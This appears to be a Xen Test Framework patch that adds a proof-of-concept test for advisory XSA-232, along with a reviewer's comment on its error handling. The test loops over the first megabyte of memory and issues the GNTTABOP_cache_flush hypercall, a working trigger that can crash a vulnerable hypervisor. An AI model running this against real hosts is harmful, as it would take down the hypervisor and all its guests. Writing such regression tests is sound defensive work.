uint32_t version;
};
+/*
+ * Issue one or more cache maintenance operations on a portion of a
+ * page granted to the calling domain by a foreign domain.
+ */
+#define GNTTABOP_cache_flush 12
+struct gnttab_cache_flush {
+ union {
+ uint64_t dev_bus_addr;
+ grant_ref_t ref;
+ } a;
+ uint16_t offset; /* offset from start of grant */
+ uint16_t length; /* size within the grant */
+#define GNTTAB_CACHE_CLEAN (1<<0)
+#define GNTTAB_CACHE_INVAL (1<<1)
+#define GNTTAB_CACHE_SOURCE_GREF (1<<31)
+ uint32_t op;
+};
+
#endif /* XEN_PUBLIC_GRANT_TABLE_H */
/*
--- /dev/null
+/**
+ * @file tests/xsa-232/main.c
+ * @ref test-xsa-232
+ *
+ * @page test-xsa-232 XSA-232
+ *
+ * Advisory: [XSA-232](http://xenbits.xen.org/xsa/advisory-232.html)
+ *
+ * GNTTABOP_cache_flush takes a machine address, looks up the page owner and
+ * unconditionally follows the owners grant table pointer. For system domains
+ * such as DOMID_IO, there is no grant table set up.
+ *
+ * Loop over the first 1MB of memory (which is owned by DOMID_IO), poking the
+ * hypercall. If Xen remains alive, it is probably not vulnerable.
+ *
+ * @see tests/xsa-232/main.c
+ */
+#include <xtf.h>
+
+#include <arch/pagetable.h>
+#include <arch/symbolic-const.h>
+
+const char test_title[] = "XSA-232 PoC";
+
+void test_main(void)
+{
+ struct gnttab_cache_flush flush = {
+ .length = PAGE_SIZE,
+ .op = GNTTAB_CACHE_INVAL | GNTTAB_CACHE_CLEAN,
+ };
+
+ for ( ; flush.a.dev_bus_addr < MB(1); flush.a.dev_bus_addr += PAGE_SIZE )
+ hypercall_grant_table_op(GNTTABOP_cache_flush, &flush, 1);
+
+ /* If Xen is alive at this point, it is probably not vulnerable. */
+
+ xtf_success("Success: Probably not vulnerable to XSA-232\n");
+}
+
+/*
+ * Local variables:
+ * mode: C
+ * c-file-style: "BSD"
+ * c-basic-offset: 4
+ * tab-width: 4
+ * indent-tabs-mode: nil
+ * End:
+ */
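Review bot: The return value of `hypercall_grant_table_op()` in the loop in test_main() is discarded, so the test prints "Probably not vulnerable" whenever Xen survives, including when the op was refused before the page-owner lookup ever ran. `struct gnttab_cache_flush` as defined in the header hunk on this page has no status field, so the hypercall's return value is the only signal that the path was exercised. I would capture it, `long rc = hypercall_grant_table_op(GNTTABOP_cache_flush, &flush, 1);`, and report a skip rather than success when the op is unavailable, e.g. `if ( rc == -ENOSYS ) return xtf_skip("Skip: GNTTABOP_cache_flush not available\n");`. Other error returns are presumably expected on a fixed hypervisor and can stay ignored, but a short comment saying so would help anyone who reads a passing result as evidence of a patched host.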